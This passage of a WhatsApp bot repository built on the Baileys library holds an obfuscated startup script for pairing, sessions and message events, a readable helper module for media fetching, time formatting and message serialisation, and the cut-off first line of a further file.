_0xb02e=function(_0xb02e40,_0x2ec427){_0xb02e40=_0xb02e40-0x11b;let _0xaf1867=_0x37f236[_0xb02e40];return _0xaf1867;},_0xb02e(_0x43d376,_0x1d7396);}async function startXeonBotInc(){const _0x9f52b8=_0x5bc89b;let {version:_0xed3df3,isLatest:_0x557139}=await fetchLatestBaileysVersion();const {state:_0x4bffb5,saveCreds:_0x248cf5}=await useMultiFileAuthState(_0x9f52b8(0x1a0)),_0x9e6941=new NodeCache(),_0x340468=makeWASocket({'logger':pino({'level':_0x9f52b8(0x157)}),'printQRInTerminal':!pairingCode,'browser':Browsers['windows'](_0x9f52b8(0x11f)),'auth':{'creds':_0x4bffb5[_0x9f52b8(0x148)],'keys':makeCacheableSignalKeyStore(_0x4bffb5[_0x9f52b8(0x194)],Pino({'level':'fatal'})[_0x9f52b8(0x137)]({'level':_0x9f52b8(0x18a)}))},'markOnlineOnConnect':!![],'generateHighQualityLinkPreview':!![],'getMessage':async _0x43afb6=>{const _0x4b19f6=_0x9f52b8;let _0x17b737=jidNormalizedUser(_0x43afb6[_0x4b19f6(0x1a1)]),_0x441f3a=await store['loadMessage'](_0x17b737,_0x43afb6['id']);return _0x441f3a?.[_0x4b19f6(0x17d)]||'';},'msgRetryCounterCache':_0x9e6941,'defaultQueryTimeoutMs':undefined});store[_0x9f52b8(0x161)](_0x340468['ev']);if(pairingCode&&!_0x340468['authState'][_0x9f52b8(0x148)][_0x9f52b8(0x178)]){if(useMobile)throw new Error('Cannot\x20use\x20pairing\x20code\x20with\x20mobile\x20api');let _0x31e2cd;!!_0x31e2cd?(_0x31e2cd=_0x31e2cd['replace'](/[^0-9]/g,''),!Object[_0x9f52b8(0x194)](PHONENUMBER_MCC)[_0x9f52b8(0x152)](_0x3af505=>_0x31e2cd[_0x9f52b8(0x151)](_0x3af505))&&(console[_0x9f52b8(0x153)](chalk['bgBlack'](chalk[_0x9f52b8(0x15f)](_0x9f52b8(0x187)))),process[_0x9f52b8(0x128)](0x0))):(_0x31e2cd=await question(chalk[_0x9f52b8(0x144)](chalk['greenBright'](_0x9f52b8(0x188)))),_0x31e2cd=_0x31e2cd[_0x9f52b8(0x19a)](/[^0-9]/g,''),!Object['keys'](PHONENUMBER_MCC)[_0x9f52b8(0x152)](_0x3c76dc=>_0x31e2cd[_0x9f52b8(0x151)](_0x3c76dc))&&(console['log'](chalk[_0x9f52b8(0x144)](chalk[_0x9f52b8(0x15f)](_0x9f52b8(0x187)))),_0x31e2cd=await question(chalk[_0x9f52b8(0x144)](chalk[_0x9f52b8(0x149)](_0x9f52b8(0x188)))),_0x31e2cd=_0x31e2cd['replace'](/[^0-9]/g,''),rl[_0x9f52b8(0x17f)]())),setTimeout(async()=>{const _0x4c5dd7=_0x9f52b8;let _0x330bf9=await _0x340468[_0x4c5dd7(0x16f)](_0x31e2cd);_0x330bf9=_0x330bf9?.[_0x4c5dd7(0x18e)](/.{1,4}/g)?.[_0x4c5dd7(0x16b)]('-')||_0x330bf9,console[_0x4c5dd7(0x153)](chalk[_0x4c5dd7(0x12a)](chalk['bgGreen'](_0x4c5dd7(0x171))),chalk[_0x4c5dd7(0x12a)](chalk[_0x4c5dd7(0x174)](_0x330bf9)));},0xbb8);}_0x340468['ev']['on'](_0x9f52b8(0x1a3),async _0x57e9fb=>{const _0x2eeb4c=_0x9f52b8;try{const _0x561b15=_0x57e9fb[_0x2eeb4c(0x12b)][0x0];if(!_0x561b15[_0x2eeb4c(0x17d)])return;_0x561b15[_0x2eeb4c(0x17d)]=Object[_0x2eeb4c(0x194)](_0x561b15[_0x2eeb4c(0x17d)])[0x0]===_0x2eeb4c(0x13a)?_0x561b15[_0x2eeb4c(0x17d)]['ephemeralMessage']['message']:_0x561b15[_0x2eeb4c(0x17d)];if(_0x561b15[_0x2eeb4c(0x13d)]&&_0x561b15[_0x2eeb4c(0x13d)][_0x2eeb4c(0x1a1)]===_0x2eeb4c(0x127)){if(!_0x340468[_0x2eeb4c(0x189)]&&!_0x561b15[_0x2eeb4c(0x13d)][_0x2eeb4c(0x173)]&&_0x57e9fb[_0x2eeb4c(0x17b)]===_0x2eeb4c(0x140))return;}if(_0x561b15[_0x2eeb4c(0x13d)]['id'][_0x2eeb4c(0x151)](_0x2eeb4c(0x129))&&_0x561b15['key']['id'][_0x2eeb4c(0x182)]===0x10)return;const _0x138be6=smsg(_0x340468,_0x561b15,store);require(_0x2eeb4c(0x15e))(_0x340468,_0x138be6,_0x57e9fb,store);}catch(_0x264a0a){console[_0x2eeb4c(0x153)](_0x264a0a);}}),_0x340468['ev']['on'](_0x9f52b8(0x1a3),async _0x1fab33=>{const _0x53ad51=_0x9f52b8;global[_0x53ad51(0x15d)]&&(mek=_0x1fab33[_0x53ad51(0x12b)][0x0],mek[_0x53ad51(0x13d)]&&mek[_0x53ad51(0x13d)][_0x53ad51(0x1a1)]===_0x53ad51(0x127)&&await _0x340468[_0x53ad51(0x165)]([mek[_0x53ad51(0x13d)]]));}),_0x340468['decodeJid']=_0x12bf25=>{const _0x320edb=_0x9f52b8;if(!_0x12bf25)return _0x12bf25;if(/:\d+@/gi[_0x320edb(0x17c)](_0x12bf25)){let _0x62fadd=jidDecode(_0x12bf25)||{};return _0x62fadd['user']&&_0x62fadd[_0x320edb(0x135)]&&_0x62fadd[_0x320edb(0x16c)]+'@'+_0x62fadd[_0x320edb(0x135)]||_0x12bf25;}else return _0x12bf25;},_0x340468['ev']['on'](_0x9f52b8(0x198),_0x2113f4=>{const _0x4d93b6=_0x9f52b8;for(let _0x64c662 of _0x2113f4){let _0x2691da=_0x340468[_0x4d93b6(0x184)](_0x64c662['id']);if(store&&store[_0x4d93b6(0x123)])store['contacts'][_0x2691da]={'id':_0x2691da,'name':_0x64c662[_0x4d93b6(0x140)]};}}),_0x340468[_0x9f52b8(0x13c)]=(_0xf0de83,_0x2c047d=![])=>{const _0x28690c=_0x9f52b8;id=_0x340468['decodeJid'](_0xf0de83),_0x2c047d=_0x340468[_0x28690c(0x167)]||_0x2c047d;let _0x57aeeb;if(id[_0x28690c(0x13f)]('@g.us'))return new Promise(async _0x4f0b8d=>{const _0x7fe199=_0x28690c;_0x57aeeb=store[_0x7fe199(0x123)][id]||{};if(!(_0x57aeeb[_0x7fe199(0x163)]||_0x57aeeb[_0x7fe199(0x126)]))_0x57aeeb=_0x340468['groupMetadata'](id)||{};_0x4f0b8d(_0x57aeeb[_0x7fe199(0x163)]||_0x57aeeb['subject']||PhoneNumber('+'+id['replace']('@s.whatsapp.net',''))[_0x7fe199(0x185)]('international'));});else _0x57aeeb=id===_0x28690c(0x169)?{'id':id,'name':_0x28690c(0x147)}:id===_0x340468[_0x28690c(0x184)](_0x340468[_0x28690c(0x16c)]['id'])?_0x340468[_0x28690c(0x16c)]:store[_0x28690c(0x123)][id]||{};return(_0x2c047d?'':_0x57aeeb[_0x28690c(0x163)])||_0x57aeeb[_0x28690c(0x126)]||_0x57aeeb['verifiedName']||PhoneNumber('+'+_0xf0de83['replace']('@s.whatsapp.net',''))[_0x28690c(0x185)]('international');},_0x340468[_0x9f52b8(0x189)]=!![],_0x340468[_0x9f52b8(0x19b)]=_0x308217=>smsg(_0x340468,_0x308217,store),_0x340468['ev']['on'](_0x9f52b8(0x125),async _0x372d28=>{const _0x5e74d4=_0x9f52b8,{connection:_0x212ff2,lastDisconnect:_0x2486e5}=_0x372d28;_0x212ff2==_0x5e74d4(0x177)&&(console[_0x5e74d4(0x153)](chalk['magenta']('\x20')),console['log'](chalk['yellow'](_0x5e74d4(0x141)+JSON[_0x5e74d4(0x158)](_0x340468[_0x5e74d4(0x16c)],null,0x2))),await delay(0x7cf),console[_0x5e74d4(0x153)](chalk[_0x5e74d4(0x11c)]('\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'+chalk[_0x5e74d4(0x139)][_0x5e74d4(0x190)]('[\x20'+botname+'\x20]')+'\x0a\x0a')),console[_0x5e74d4(0x153)](chalk[_0x5e74d4(0x150)](_0x5e74d4(0x134))),console[_0x5e74d4(0x153)](chalk[_0x5e74d4(0x16d)]('\x0a'+themeemoji+_0x5e74d4(0x19f))),console[_0x5e74d4(0x153)](chalk[_0x5e74d4(0x16d)](themeemoji+_0x5e74d4(0x16a))),console[_0x5e74d4(0x153)](chalk[_0x5e74d4(0x16d)](themeemoji+_0x5e74d4(0x191))),console[_0x5e74d4(0x153)](chalk[_0x5e74d4(0x16d)](themeemoji+_0x5e74d4(0x176)+owner)),console[_0x5e74d4(0x153)](chalk[_0x5e74d4(0x16d)](themeemoji+_0x5e74d4(0x155)+wm+'\x0a'))),_0x212ff2===_0x5e74d4(0x17f)&&_0x2486e5&&_0x2486e5[_0x5e74d4(0x122)]&&_0x2486e5[_0x5e74d4(0x122)]['output'][_0x5e74d4(0x17e)]!=0x191&&startXeonBotInc();}),_0x340468['ev']['on']('creds.update',_0x248cf5),_0x340468['ev']['on'](_0x9f52b8(0x1a3),()=>{}),_0x340468['sendText']=(_0x277b72,_0x92d41b,_0x24b7d5='',_0x402cb4)=>_0x340468[_0x9f52b8(0x136)](_0x277b72,{'text':_0x92d41b,..._0x402cb4},{'quoted':_0x24b7d5,..._0x402cb4}),_0x340468['sendTextWithMentions']=async(_0x562b2c,_0x49a9b2,_0x3278c5,_0x1dd899={})=>_0x340468[_0x9f52b8(0x136)](_0x562b2c,{'text':_0x49a9b2,'mentions':[..._0x49a9b2[_0x9f52b8(0x164)](/@(\d{0,16})/g)][_0x9f52b8(0x14a)](_0x5c4119=>_0x5c4119[0x1]+'@s.whatsapp.net'),..._0x1dd899},{'quoted':_0x3278c5}),_0x340468['sendImageAsSticker']=async(_0x4fa947,_0x560aa5,_0x2e3486,_0x24c942={})=>{const _0x3688d4=_0x9f52b8;let _0x2ec9a9=Buffer[_0x3688d4(0x120)](_0x560aa5)?_0x560aa5:/^data:.*?\/.*?;base64,/i[_0x3688d4(0x17c)](_0x560aa5)?Buffer[_0x3688d4(0x159)](_0x560aa5[_0x3688d4(0x131)]`,`[0x1],_0x3688d4(0x130)):/^https?:\/\//[_0x3688d4(0x17c)](_0x560aa5)?await await getBuffer(_0x560aa5):fs[_0x3688d4(0x14f)](_0x560aa5)?fs[_0x3688d4(0x186)](_0x560aa5):Buffer[_0x3688d4(0x156)](0x0),_0x1a4b80;return _0x24c942&&(_0x24c942[_0x3688d4(0x142)]||_0x24c942[_0x3688d4(0x18d)])?_0x1a4b80=await writeExifImg(_0x2ec9a9,_0x24c942):_0x1a4b80=await imageToWebp(_0x2ec9a9),await _0x340468[_0x3688d4(0x136)](_0x4fa947,{'sticker':{'url':_0x1a4b80},..._0x24c942},{'quoted':_0x2e3486}),_0x1a4b80;},_0x340468[_0x9f52b8(0x18b)]=async(_0x1d99bc,_0x231545,_0x5ba9e9,_0x1fa63d={})=>{const _0x2b25fd=_0x9f52b8;let _0x1eb26e=Buffer['isBuffer'](_0x231545)?_0x231545:/^data:.*?\/.*?;base64,/i[_0x2b25fd(0x17c)](_0x231545)?Buffer[_0x2b25fd(0x159)](_0x231545[_0x2b25fd(0x131)]`,`[0x1],_0x2b25fd(0x130)):/^https?:\/\//[_0x2b25fd(0x17c)](_0x231545)?await await getBuffer(_0x231545):fs[_0x2b25fd(0x14f)](_0x231545)?fs[_0x2b25fd(0x186)](_0x231545):Buffer['alloc'](0x0),_0x3881c8;return _0x1fa63d&&(_0x1fa63d[_0x2b25fd(0x142)]||_0x1fa63d['author'])?_0x3881c8=await writeExifVid(_0x1eb26e,_0x1fa63d):_0x3881c8=await videoToWebp(_0x1eb26e),await _0x340468[_0x2b25fd(0x136)](_0x1d99bc,{'sticker':{'url':_0x3881c8},..._0x1fa63d},{'quoted':_0x5ba9e9}),_0x3881c8;},_0x340468[_0x9f52b8(0x196)]=async(_0xe10263,_0x383df7,_0x8019c6=!![])=>{const _0x39cc36=_0x9f52b8;let _0x4b6937=_0xe10263[_0x39cc36(0x14d)]?_0xe10263[_0x39cc36(0x14d)]:_0xe10263,_0x2afffc=(_0xe10263['msg']||_0xe10263)[_0x39cc36(0x170)]||'',_0x25bb9b=_0xe10263[_0x39cc36(0x15a)]?_0xe10263['mtype']['replace'](/Message/gi,''):_0x2afffc[_0x39cc36(0x131)]('/')[0x0];const _0x3cea2d=await downloadContentFromMessage(_0x4b6937,_0x25bb9b);let _0x51bb87=Buffer[_0x39cc36(0x159)]([]);for await(const _0x5aa0e4 of _0x3cea2d){_0x51bb87=Buffer[_0x39cc36(0x19c)]([_0x51bb87,_0x5aa0e4]);}let _0x4f02fc=await FileType[_0x39cc36(0x183)](_0x51bb87);return trueFileName=_0x8019c6?_0x383df7+'.'+_0x4f02fc[_0x39cc36(0x133)]:_0x383df7,await fs[_0x39cc36(0x14e)](trueFileName,_0x51bb87),trueFileName;},_0x340468[_0x9f52b8(0x12d)]=async _0x190a70=>{const _0x158a41=_0x9f52b8;let _0x5b079f=(_0x190a70[_0x158a41(0x14d)]||_0x190a70)[_0x158a41(0x170)]||'',_0x5b70f4=_0x190a70[_0x158a41(0x15a)]?_0x190a70[_0x158a41(0x15a)][_0x158a41(0x19a)](/Message/gi,''):_0x5b079f[_0x158a41(0x131)]('/')[0x0];const _0x4cfddf=await downloadContentFromMessage(_0x190a70,_0x5b70f4);let _0x549988=Buffer[_0x158a41(0x159)]([]);for await(const _0x74a6c7 of _0x4cfddf){_0x549988=Buffer[_0x158a41(0x19c)]([_0x549988,_0x74a6c7]);}return _0x549988;};}return startXeonBotInc();let file=require[_0x5bc89b(0x179)](__filename);function _0x37f2(){const _0x389fdc=['yellow','readline','stdout','Firefox','isBuffer','awesome-phonenumber','error','contacts','already-exists','connection.update','subject','status@broadcast','exit','BAE5','black','messages','@hapi/boom','downloadMediaMessage','49407CYokOy','node-cache','base64','split','chalk','ext','<\x20==================================================\x20>','server','sendMessage','child','createInterface','bold','ephemeralMessage','90qPBGwl','getName','key','Connection\x20Closed','endsWith','notify','🌿Connected\x20to\x20=>\x20','packname','2348140825959','bgBlack','@whiskeysockets/baileys','watchFile','WhatsApp','creds','greenBright','map','906IHRtOD','./lib/exif','msg','writeFileSync','existsSync','cyan','startsWith','some','log','137469yFEVcp','\x20CREDIT:\x20','alloc','silent','stringify','from','mtype','argv','39774wnvQtS','autoswview','./BadboiV4','redBright','Update\x20','bind','file-type','name','matchAll','readMessages','./lib/myfunc','withoutContact','includes','0@s.whatsapp.net','\x20GITHUB:\x20BADBOI-v1\x20','join','user','magenta','3798988uzJchJ','requestPairingCode','mimetype','Your\x20Pairing\x20Code\x20:\x20','--mobile','fromMe','white','unwatchFile','\x20WA\x20NUMBER:\x20','open','registered','resolve','stdin','type','test','message','statusCode','close','2512827eJnUzx','axios','length','fromBuffer','decodeJid','getNumber','readFileSync','Start\x20with\x20country\x20code\x20of\x20your\x20WhatsApp\x20Number,\x20Example\x20:\x20+2348140825959','Please\x20type\x20your\x20WhatsApp\x20number\x20😍\x0aFor\x20example:\x20+2348140825959\x20:\x20','public','fatal','sendVideoAsSticker','Timed\x20Out','author','match','./badboiset','blue','\x20INSTAGRAM:\x20@BADBOI\x20','libphonenumber-js','question','keys','pino','downloadAndSaveMediaMessage','16YhUhNt','contacts.update','cache','replace','serializeM','concat','10365688fCGOsn','4359590AacqOe','\x20YT\x20CHANNEL:\x20BADBOI','./session','remoteJid','not-authorized','messages.upsert','./database/owner.json','Value\x20not\x20found'];_0x37f2=function(){return _0x389fdc;};return _0x37f2();}fs[_0x5bc89b(0x146)](file,()=>{const _0x4f40a0=_0x5bc89b;fs[_0x4f40a0(0x175)](file),console[_0x4f40a0(0x153)](chalk[_0x4f40a0(0x15f)](_0x4f40a0(0x160)+__filename)),delete require[_0x4f40a0(0x199)][file],require(file);}),process['on']('uncaughtException',function(_0x29480a){const _0x12c375=_0x5bc89b;let _0x3081a4=String(_0x29480a);if(_0x3081a4[_0x12c375(0x168)]('conflict'))return;if(_0x3081a4[_0x12c375(0x168)]('Socket\x20connection\x20timeout'))return;if(_0x3081a4[_0x12c375(0x168)](_0x12c375(0x1a2)))return;if(_0x3081a4['includes'](_0x12c375(0x124)))return;if(_0x3081a4[_0x12c375(0x168)]('rate-overlimit'))return;if(_0x3081a4[_0x12c375(0x168)](_0x12c375(0x13e)))return;if(_0x3081a4['includes'](_0x12c375(0x18c)))return;if(_0x3081a4['includes'](_0x12c375(0x11b)))return;console['log']('Caught\x20exception:\x20',_0x29480a);}); -------------------------------------------------------------------------------- /lib/myfunc.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | const { 11 | proto, 12 | delay, 13 | getContentType 14 | } = require('@whiskeysockets/baileys') 15 | const chalk = require('chalk') 16 | const fs = require('fs') 17 | const Crypto = require('crypto') 18 | const axios = require('axios') 19 | const moment = require('moment-timezone') 20 | const { 21 | sizeFormatter 22 | } = require('human-readable') 23 | const util = require('util') 24 | const Jimp = require('jimp') 25 | const { 26 | defaultMaxListeners 27 | } = require('stream') 28 | 29 | const unixTimestampSeconds = (date = new Date()) => Math.floor(date.getTime() / 1000) 30 | 31 | exports.unixTimestampSeconds = unixTimestampSeconds 32 | 33 | exports.generateMessageTag = (epoch) => { 34 | let tag = (0, exports.unixTimestampSeconds)().toString(); 35 | if (epoch) 36 | tag += '.--' + epoch; // attach epoch if provided 37 | return tag; 38 | } 39 | 40 | exports.processTime = (timestamp, now) => { 41 | return moment.duration(now - moment(timestamp * 1000)).asSeconds() 42 | } 43 | 44 | exports.getRandom = (ext) => { 45 | return `${Math.floor(Math.random() * 10000)}${ext}` 46 | } 47 | 48 | exports.getBuffer = async (url, options) => { 49 | try { 50 | options ? options : {} 51 | const res = await axios({ 52 | method: "get", 53 | url, 54 | headers: { 55 | 'DNT': 1, 56 | 'Upgrade-Insecure-Request': 1 57 | }, 58 | ...options, 59 | responseType: 'arraybuffer' 60 | }) 61 | return res.data 62 | } catch (err) { 63 | return err 64 | } 65 | } 66 | 67 | exports.getImg = async (url, options) => { 68 | try { 69 | options ? options : {} 70 | const res = await axios({ 71 | method: "get", 72 | url, 73 | headers: { 74 | 'DNT': 1, 75 | 'Upgrade-Insecure-Request': 1 76 | }, 77 | ...options, 78 | responseType: 'arraybuffer' 79 | }) 80 | return res.data 81 | } catch (err) { 82 | return err 83 | } 84 | } 85 | 86 | exports.fetchJson = async (url, options) => { 87 | try { 88 | options ? options : {} 89 | const res = await axios({ 90 | method: 'GET', 91 | url: url, 92 | headers: { 93 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36' 94 | }, 95 | ...options 96 | }) 97 | return res.data 98 | } catch (err) { 99 | return err 100 | } 101 | } 102 | 103 | exports.runtime = function(seconds) { 104 | seconds = Number(seconds); 105 | var d = Math.floor(seconds / (3600 * 24)); 106 | var h = Math.floor(seconds % (3600 * 24) / 3600); 107 | var m = Math.floor(seconds % 3600 / 60); 108 | var s = Math.floor(seconds % 60); 109 | var dDisplay = d > 0 ? d + (d == 1 ? " day, " : " days, ") : ""; 110 | var hDisplay = h > 0 ? h + (h == 1 ? " hour, " : " hours, ") : ""; 111 | var mDisplay = m > 0 ? m + (m == 1 ? " minute, " : " minutes, ") : ""; 112 | var sDisplay = s > 0 ? s + (s == 1 ? " second" : " seconds") : ""; 113 | return dDisplay + hDisplay + mDisplay + sDisplay; 114 | } 115 | 116 | exports.clockString = (ms) => { 117 | let h = isNaN(ms) ? '--' : Math.floor(ms / 3600000) 118 | let m = isNaN(ms) ? '--' : Math.floor(ms / 60000) % 60 119 | let s = isNaN(ms) ? '--' : Math.floor(ms / 1000) % 60 120 | return [h, m, s].map(v => v.toString().padStart(2, 0)).join(':') 121 | } 122 | 123 | exports.sleep = async (ms) => { 124 | return new Promise(resolve => setTimeout(resolve, ms)); 125 | } 126 | 127 | exports.isUrl = (url) => { 128 | return url.match(new RegExp(/https?:\/\/(www\.)?[-a-zA-Z0-9@:%._+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_+.~#?&/=]*)/, 'gi')) 129 | } 130 | 131 | exports.getTime = (format, date) => { 132 | if (date) { 133 | return moment(date).locale('id').format(format) 134 | } else { 135 | return moment.tz('Asia/Jakarta').locale('id').format(format) 136 | } 137 | } 138 | 139 | exports.formatDate = (n, locale = 'id') => { 140 | let d = new Date(n) 141 | return d.toLocaleDateString(locale, { 142 | weekday: 'long', 143 | day: 'numeric', 144 | month: 'long', 145 | year: 'numeric', 146 | hour: 'numeric', 147 | minute: 'numeric', 148 | second: 'numeric' 149 | }) 150 | } 151 | 152 | exports.tanggal = (numer) => { 153 | myMonths = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]; 154 | myDays = ['Minggu', 'Senin', 'Selasa', 'Rabu', 'Kamis', 'Jum’at', 'Sabtu']; 155 | var tgl = new Date(numer); 156 | var day = tgl.getDate() 157 | bulan = tgl.getMonth() 158 | var thisDay = tgl.getDay(), 159 | thisDay = myDays[thisDay]; 160 | var yy = tgl.getYear() 161 | var year = (yy < 1000) ? yy + 1900 : yy; 162 | const time = moment.tz('Asia/Jakarta').format('DD/MM HH:mm:ss') 163 | let d = new Date 164 | let locale = 'id' 165 | let gmt = new Date(0).getTime() - new Date('1 January 1970').getTime() 166 | let weton = ['Pahing', 'Pon', 'Wage', 'Kliwon', 'Legi'][Math.floor(((d * 1) + gmt) / 84600000) % 5] 167 | 168 | return `${thisDay}, ${day} - ${myMonths[bulan]} - ${year}` 169 | } 170 | exports.jam = (numer, options = {}) => { 171 | let format = options.format ? options.format : "HH:mm" 172 | let jam = options?.timeZone ? moment(numer).tz(timeZone).format(format) : moment(numer).format(format) 173 | 174 | return `${jam}` 175 | } 176 | 177 | exports.formatp = sizeFormatter({ 178 | std: 'JEDEC', //'SI' = default | 'IEC' | 'JEDEC' 179 | decimalPlaces: 2, 180 | keepTrailingZeroes: false, 181 | render: (literal, symbol) => `${literal} ${symbol}B`, 182 | }) 183 | 184 | exports.json = (string) => { 185 | return JSON.stringify(string, null, 2) 186 | } 187 | 188 | function format(...args) { 189 | return util.format(...args) 190 | } 191 | 192 | exports.logic = (check, inp, out) => { 193 | if (inp.length !== out.length) throw new Error('Input and Output must have same length') 194 | for (let i in inp) 195 | if (util.isDeepStrictEqual(check, inp[i])) return out[i] 196 | return null 197 | } 198 | 199 | exports.generateProfilePicture = async (buffer) => { 200 | const jimp = await Jimp.read(buffer) 201 | const min = jimp.getWidth() 202 | const max = jimp.getHeight() 203 | const cropped = jimp.crop(0, 0, min, max) 204 | return { 205 | img: await cropped.scaleToFit(720, 720).getBufferAsync(Jimp.MIME_JPEG), 206 | preview: await cropped.scaleToFit(720, 720).getBufferAsync(Jimp.MIME_JPEG) 207 | } 208 | } 209 | 210 | exports.bytesToSize = (bytes, decimals = 2) => { 211 | if (bytes === 0) return '0 Bytes'; 212 | 213 | const k = 1024; 214 | const dm = decimals < 0 ? 0 : decimals; 215 | const sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB']; 216 | 217 | const i = Math.floor(Math.log(bytes) / Math.log(k)); 218 | 219 | return parseFloat((bytes / Math.pow(k, i)).toFixed(dm)) + ' ' + sizes[i]; 220 | } 221 | 222 | exports.getSizeMedia = (path) => { 223 | return new Promise((resolve, reject) => { 224 | if (/http/.test(path)) { 225 | axios.get(path) 226 | .then((res) => { 227 | let length = parseInt(res.headers['content-length']) 228 | let size = exports.bytesToSize(length, 3) 229 | if (!isNaN(length)) resolve(size) 230 | }) 231 | } else if (Buffer.isBuffer(path)) { 232 | let length = Buffer.byteLength(path) 233 | let size = exports.bytesToSize(length, 3) 234 | if (!isNaN(length)) resolve(size) 235 | } else { 236 | reject('error gatau apah') 237 | } 238 | }) 239 | } 240 | 241 | exports.parseMention = (text = '') => { 242 | return [...text.matchAll(/@([0-9]{5,16}|0)/g)].map(v => v[1] + '@s.whatsapp.net') 243 | } 244 | 245 | exports.getGroupAdmins = (participants) => { 246 | let admins = [] 247 | for (let i of participants) { 248 | i.admin === "superadmin" ? admins.push(i.id) : i.admin === "admin" ? admins.push(i.id) : '' 249 | } 250 | return admins || [] 251 | } 252 | 253 | /** 254 | * Serialize Message 255 | * @param {WAConnection} conn 256 | * @param {Object} m 257 | * @param {store} store 258 | */ 259 | exports.smsg = (XeonBotInc, m, store) => { 260 | if (!m) return m 261 | let M = proto.WebMessageInfo 262 | if (m.key) { 263 | m.id = m.key.id 264 | m.isBaileys = m.id.startsWith('BAE5') && m.id.length === 16 265 | m.chat = m.key.remoteJid 266 | m.fromMe = m.key.fromMe 267 | m.isGroup = m.chat.endsWith('@g.us') 268 | m.sender = XeonBotInc.decodeJid(m.fromMe && XeonBotInc.user.id || m.participant || m.key.participant || m.chat || '') 269 | if (m.isGroup) m.participant = XeonBotInc.decodeJid(m.key.participant) || '' 270 | } 271 | if (m.message) { 272 | m.mtype = getContentType(m.message) 273 | m.msg = (m.mtype == 'viewOnceMessage' ? m.message[m.mtype].message[getContentType(m.message[m.mtype].message)] : m.message[m.mtype]) 274 | m.body = m.message.conversation || m.msg.caption || m.msg.text || (m.mtype == 'listResponseMessage') && m.msg.singleSelectReply.selectedRowId || (m.mtype == 'buttonsResponseMessage') && m.msg.selectedButtonId || (m.mtype == 'viewOnceMessage') && m.msg.caption || m.text 275 | let quoted = m.quoted = m.msg.contextInfo ? m.msg.contextInfo.quotedMessage : null 276 | m.mentionedJid = m.msg.contextInfo ? m.msg.contextInfo.mentionedJid : [] 277 | if (m.quoted) { 278 | let type = getContentType(quoted) 279 | m.quoted = m.quoted[type] 280 | if (['productMessage'].includes(type)) { 281 | type = getContentType(m.quoted) 282 | m.quoted = m.quoted[type] 283 | } 284 | if (typeof m.quoted === 'string') m.quoted = { 285 | text: m.quoted 286 | } 287 | m.quoted.mtype = type 288 | m.quoted.id = m.msg.contextInfo.stanzaId 289 | m.quoted.chat = m.msg.contextInfo.remoteJid || m.chat 290 | m.quoted.isBaileys = m.quoted.id ? m.quoted.id.startsWith('BAE5') && m.quoted.id.length === 16 : false 291 | m.quoted.sender = XeonBotInc.decodeJid(m.msg.contextInfo.participant) 292 | m.quoted.fromMe = m.quoted.sender === (XeonBotInc.user && XeonBotInc.user.id) 293 | m.quoted.text = m.quoted.text || m.quoted.caption || m.quoted.conversation || m.quoted.contentText || m.quoted.selectedDisplayText || m.quoted.title || '' 294 | m.quoted.mentionedJid = m.msg.contextInfo ? m.msg.contextInfo.mentionedJid : [] 295 | m.getQuotedObj = m.getQuotedMessage = async () => { 296 | if (!m.quoted.id) return false 297 | let q = await store.loadMessage(m.chat, m.quoted.id, XeonBotInc) 298 | return exports.smsg(XeonBotInc, q, store) 299 | } 300 | let vM = m.quoted.fakeObj = M.fromObject({ 301 | key: { 302 | remoteJid: m.quoted.chat, 303 | fromMe: m.quoted.fromMe, 304 | id: m.quoted.id 305 | }, 306 | message: quoted, 307 | ...(m.isGroup ? { 308 | participant: m.quoted.sender 309 | } : {}) 310 | }) 311 | 312 | /** 313 | * 314 | * @returns 315 | */ 316 | m.quoted.delete = () => XeonBotInc.sendMessage(m.quoted.chat, { 317 | delete: vM.key 318 | }) 319 | 320 | /** 321 | * 322 | * @param {*} jid 323 | * @param {*} forceForward 324 | * @param {*} options 325 | * @returns 326 | */ 327 | m.quoted.copyNForward = (jid, forceForward = false, options = {}) => XeonBotInc.copyNForward(jid, vM, forceForward, options) 328 | 329 | /** 330 | * 331 | * @returns 332 | */ 333 | m.quoted.download = () => XeonBotInc.downloadMediaMessage(m.quoted) 334 | } 335 | } 336 | if (m.msg.url) m.download = () => XeonBotInc.downloadMediaMessage(m.msg) 337 | m.text = m.msg.text || m.msg.caption || m.message.conversation || m.msg.contentText || m.msg.selectedDisplayText || m.msg.title || '' 338 | /** 339 | * Reply to this message 340 | * @param {String|Object} text 341 | * @param {String|false} chatId 342 | * @param {Object} options 343 | */ 344 | m.reply = (text, chatId = m.chat, options = {}) => Buffer.isBuffer(text) ? XeonBotInc.sendMedia(chatId, text, 'file', '', m, { 345 | ...options 346 | }) : XeonBotInc.sendText(chatId, text, m, { 347 | ...options 348 | }) 349 | /** 350 | * Copy this message 351 | */ 352 | m.copy = () => exports.smsg(XeonBotInc, M.fromObject(M.toObject(m))) 353 | 354 | /** 355 | * 356 | * @param {*} jid 357 | * @param {*} forceForward 358 | * @param {*} options 359 | * @returns 360 | */ 361 | m.copyNForward = (jid = m.chat, forceForward = false, options = {}) => XeonBotInc.copyNForward(jid, m, forceForward, options) 362 | 363 | return m 364 | } 365 | exports.reSize = (buffer, ukur1, ukur2) => { 366 | return new Promise(async (resolve, reject) => { 367 | var baper = await Jimp.read(buffer); 368 | var ab = await baper.resize(ukur1, ukur2).getBufferAsync(Jimp.MIME_JPEG) 369 | resolve(ab) 370 | }) 371 | } 372 | 373 | let file = require.resolve(__filename) 374 | fs.watchFile(file, () => { 375 | fs.unwatchFile(file) 376 | console.log(chalk.redBright(`Update ${__filename}`)) 377 | delete require.cache[file] 378 | require(file) 379 | }) 380 | -------------------------------------------------------------------------------- /Badboi/xeontext11.js: -------------------------------------------------------------------------------- 1 | const xeontext11 = 